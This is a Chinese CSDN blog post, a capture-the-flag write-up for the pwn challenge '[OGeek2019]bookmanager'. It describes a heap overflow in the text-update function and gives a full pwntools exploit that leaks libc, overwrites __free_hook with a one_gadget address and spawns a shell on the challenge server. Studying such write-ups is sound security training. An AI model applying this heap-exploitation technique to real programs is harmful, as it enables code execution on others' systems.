[OGeek2019]bookmanager

最新推荐文章于 2024-08-21 09:03:46 发布
最新推荐文章于 2024-08-21 09:03:46 发布
阅读量355 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/123929562
版权

缓冲区溢出 libc地址 one_gadget 漏洞利用 代码审计
关键词由CSDN通过智能技术生成

[OGeek2019]bookmanager

查看保护
在这里插入图片描述
这题的功能多,要审计的代码多,但是漏洞也多,这里笔者就例出笔者getshell所使用的漏洞
在这里插入图片描述
可以看到这里在update text的时候可以改0xff大小, 笔者用的最多的就是这里的漏洞。
攻击思路:
1.因为可以改0xff大小所以我们可以借助这个来使得0x91全部填满,在填满之前让下面的0x91释放掉。这样一来垃圾数据就可以直接连接到被释放掉的0x91的fd这里,show一下即可拿到libc。
在这里插入图片描述
2.拿到libc之后笔者再次利用了这个漏洞先将下面的东西给恢复正常,以便后续的漏洞利用
在这里插入图片描述
3.看前面的section就可以看到倒数两个地址会存放text的地址,那我们是不是可以将text的地址给支持成free_hook呢,所以笔者再次利用了这个漏洞。
需要注意的是656565这里,因为这个section是跟着656565和倒数两个地址来锁定自己和text地址的
在这里插入图片描述

4,直接改这个section的text为one_gadget即可getshell。
这题其实有很多方法来解决,这里只是不断的利用这一个漏洞,还可以试着使用off-by-one来进行overlapping从而getshell。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27012)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Your choice:'

def add_chapter(name):
    r.sendlineafter(menu, '1')
    r.sendafter('\nChapter name:', name)

def add_section(name, sec_name):
    r.sendlineafter(menu, '2')
    r.sendafter('\nWhich chapter do you want to add into:', name)
    r.sendafter('\nSection name:', sec_name)

def add_text(sec_name, size, text):
    r.sendlineafter(menu, '3')
    r.sendafter('\nWhich section do you want to add into:', sec_name)
    r.sendlineafter('\nHow many chapters you want to write:', str(size))
    r.sendafter('\nText:', text)

def show():
    r.sendlineafter(menu, '7')

def delete_chapter(name):
    r.sendlineafter(menu, '4')
    r.sendafter('\nChapter name:', name)

def delete_section(sec_name):
    r.sendlineafter(menu, '5')
    r.sendafter('\nSection name:', sec_name)

def delete(text):
    r.sendlineafter(menu, '6')
    r.sendafter('\nSection name:', text)

def edit(index, old_name, new_name):
    r.sendlineafter(menu, '8')
    if index == 1:
        r.sendlineafter('\nWhat to update?(Chapter/Section/Text):', 'Chapter')
        r.sendafter('\nChapter name:', old_name)
        r.sendafter('\nNew Chapter name:', new_name)
    if index == 2:
        r.sendlineafter('\nWhat to update?(Chapter/Section/Text):', 'Section')
        r.sendafter('\nSection name:', old_name)
        r.sendafter('\nNew Section name:', new_name)
    if index == 3:
        r.sendlineafter('\nWhat to update?(Chapter/Section/Text):', 'Text')
        r.sendafter('\nSection name:', old_name)
        r.sendafter('\nNew Text:', new_name)

r.sendlineafter('Name of the book you want to create: ', 'z1r0')

add_chapter('aaaa')
add_section('aaaa', 'bbbb')
add_text('bbbb', 0xf8, 'cccc')

add_chapter('AAAA')
add_section('AAAA', 'BBBB')

delete_chapter('AAAA')

edit(3, 'bbbb', 'a' * 0x100)
show()

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 88 - 0x10
li('[+] malloc_hook = ' + hex(malloc_hook))
libc = ELF('./libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = one[1] + libc_base
free_hook = libc_base + libc.sym['__free_hook']
li('[+] free_hook = ' + hex(free_hook))
_IO_list_all = libc_base + libc.sym['_IO_list_all']
li('[+] _IO_list_all = ' + hex(_IO_list_all))

p2 = b'a' * 0xf8 + p64(0x91)
edit(3, 'bbbb', p2)
add_text('bbbb', 0x80, 'dddd')
#p3 = b'a' * 0x88 + p64(0x41) + p64(malloc_hook - 0x23) + p64(0) + p64(0) * 5 + p64(0x20cd1)
p3 = b'a' * 0x88 + p64(0x41) 
edit(3, 'bbbb', p3)

add_section('aaaa', 'dddd')

p4 = b'a' * 0x88 + p64(0x41) + b'e' * 8 + p64(0) * 3 + p64(free_hook) + p64(0x20)
edit(3, 'bbbb', p4)
edit(3, 'e' * 8, p64(one_gadget))

delete('bbbb')

r.interactive()
z1r0.
关注
专栏目录
BUUCTF-PWN刷题记录-10
weixin_44145820的博客
04-19 875
目录wustctf2020_number_game(neg操作原理)zctf2016_note2(强制转换溢出,unlink)wustctf2020_name_your_cat wustctf2020_number_game(neg操作原理) 需要输入一个数,变为负数之后还是负数 这题就设计计组知识了,neg的操作为按位取反+1,而0x80000000取反加一之后仍然是0x80000000,所以...
bookmanager
11-07
sqlserver数据源文件,可以通过SQL Server Managerment Studio
heap_overflow(OGeek2019-bookmanger50)
csdn546229768的博客
03-25 444
题目:OGeek2019-bookmanger50 保护 分析 add_chapter add_section add_text rm_chapter rm_section rm_text show edit 思路 这题的漏洞非常多有uaf,off-by-one,堆溢出因为漏洞太多以至于给我整不会了,ida逆向时看起来挺复杂其实就是一个常规的简单堆题,我在做unsort bin泄漏libc时把堆空间整坏了,做题时我没注意到泄漏方式的问题导致我后面做的怀疑人生,导致花了非常多时间,其实这
BUUCTF pwn 四月刷题
coco的博客
04-07 883
BUUCTF四月刷题 [OGeek2019]bookmanager 这道题程序看似比较复杂,实际上好好分析程序的结构和逻辑之后,还是一个堆溢出,在updata函数中更新text时候可以更新0xFF长度的内容,造成溢出。这类题比较重要的是一定要弄清楚程序中的各种结构再下手。 libc泄漏的手段还是通过small bin free进unsorted bin之后打印出main_arena附近的地址;ge...
BookManager2 使用指南
gitblog_00584的博客
08-21 814
BookManager2 使用指南 BookManager2基于SpringBoot+Vue的图书管理系统项目地址:https://gitcode.com/gh_mirrors/bo/BookManager2 一、项目目录结构及介绍 BookManager2/ │ ├── backend # 后端服务代码 │ ├── app # 应用...
BookManager(ios)
dujianjunqwer的博客
12-10 188
//需要创建的类: AddViewController:继承于UIViewController (xib) UpViewController:继承于UIViewController(xib) Book:继承于NSObject FMDataBaseC:继承于NSObject 需要导入的第三方:MJRefresh(刷新):由于需要通过刷新添加数据 //最终效果通过表格展示AppDeleg
BookManager
yl0588的专栏
05-18 564
USE [BookManagerSystem] GO /****** Object: Table [dbo].[Reader] Script Date: 05/17/2014 16:46:37 ******/ SET ANSI_NULLS ON GO SET QUOTED_IDENTIFIER ON GO CREATE TABLE [dbo].[Reader]( [Reader_Id]
python实现图书管理系统BookManager
weixin_43500169的博客
04-14 2533
python利用json存储实现图书管理系统
bookmanager库 建立和管理视图
zayyo的博客
01-13 1033
项目1:建立视图 1.创建一个属于计算机系的读者情况视图,视图名为“v_computer”。 create view v_computer as select * from reader where 部门=‘计算机系’ select*from v_computer 2.创建一个包括借书证号、图书名称、价格和是否过期的视图,名称为v_over。并且对定义视图的命令进行加密。 create view v_over with encryption as select 借书证号,图书名称,价格,是否过期 fro
牛客BookManager项目(未完)
qq_38056704的博客
09-25 498
1.导入github项目选择普通工程,然后update maven把配置信息更新出来,因为一般不会提交配置信息到github(这里的配置信息是eclipse工程自带的信息,一个项目组不可能每个人的eclipse一样,所以一般都会把自己的配置信息提交,如果提交了,这个人就是害人) 2.FreeMaker 3.传值...
java_bookmanager.rar_java bookmanager
09-23
《Java书籍管理系统详解》 Java编程语言在软件开发领域占据着重要的地位,尤其在企业级应用中更是广泛应用。本篇文章将深入探讨一个基于Java编写的书籍管理系统,它具备查询、添加、删除以及计算折扣价的基本功能,...
Bookmanager.zip
12-20
《基于Java的图书管理系统——深入理解Bookmanager.zip》 在当今信息时代,图书管理系统的开发与应用已经成为图书馆信息化建设的重要组成部分。本系统“Bookmanager.zip”便是一个采用Java编程语言构建的图书管理...
MiniGui业务开发基础培训-htk
11-11
MiniGui业务开发基础培训-htk
com.harmonyos.exception.DiskReadWriteException(解决方案).md
11-11
鸿蒙开发中碰到的报错,问题已解决,写个文档记录一下这个问题及解决方案
网络分析-Wireshark数据包筛选技巧详解及应用实例
11-11
内容概要:本文档详细介绍了Wireshark软件中各种数据包筛选规则,主要包括协议、IP地址、端口号、包长以及MAC地址等多个维度的具体筛选方法。同时提供了大量实用案例供读者学习,涵盖HTTP协议相关命令和逻辑条件的综合使用方式。 适合人群:对网络安全或数据分析有一定兴趣的研究者,熟悉基本网络概念和技术的专业人士。 使用场景及目标:适用于需要快速准确捕获特定类型网络流量的情况;如网络安全检测、性能优化分析、教学演示等多种实际应用场景。 阅读建议:本资料侧重于实操技能提升,在学习时最好配合实际操作练习效果更佳。注意掌握不同类型条件组合的高级用法,增强问题解决能力。
com.harmonyos.exception.BatteryOverheatException(解决方案).md
11-11
鸿蒙开发中碰到的报错,问题已解决,写个文档记录一下这个问题及解决方案
com.harmonyos.exception.ServiceUnavailableException(解决方案).md
11-11
鸿蒙开发中碰到的报错,问题已解决,写个文档记录一下这个问题及解决方案
MATLAB上机试题 MATLAB原理及应用实验报告 第3章 MATLAB的符号运算.docx
最新发布
11-11
内容概要:本文档详细介绍了MATLAB的符号运算,涵盖符号对象的命名方法、基本运算、级数求法等多个方面。通过具体的实验案例,如确定符号表达式中的变量、执行四则运算、提取分子分母、因式分解与展开、化简符号表达式、级数符号求和、符号微积分以及符号方程的求解,帮助学生理解和掌握MATLAB中的符号运算技巧。 适合人群:适用于对MATLAB有一定了解的大专院校的学生、研究人员和技术工作者。 使用场景及目标:通过本课程的学习,学员能够熟练使用MATLAB完成复杂的数学问题解决,提高科研项目和工程任务中对数学模型的建模能力和问题解决效率。 其他说明:文档包含详细的实验步骤指导和实例演示,同时提供了丰富的练习题供读者巩固所学知识。对于想要深入研究MATLAB符号运算的人来说是一份宝贵资料。
BookManager项目源码整合:API与前端框架
资源摘要信息:"本书是一本关于《BookManager》系统的开发与应用指南,涵盖了从系统设计到开发,再到实际应用的全过程。本书不仅适用于Java开发者,也适合对图书管理系统感兴趣的读者。" 知识点详细说明: 1. 文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值